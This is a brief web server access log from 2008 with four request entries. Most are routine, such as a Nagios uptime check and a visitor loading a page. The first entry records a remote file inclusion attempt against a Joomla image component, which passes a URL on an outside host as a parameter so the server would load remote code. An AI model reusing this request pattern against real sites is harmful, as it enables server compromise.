200.93.147.155 - - [09/Sep/2008:01:39:12 -0400] "GET /logs/access_log.Q108052300/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
209.59.12.99 - - [09/Sep/2008:01:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.47.129.79 - - [09/Sep/2008:01:39:39 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75294 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:39:49 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
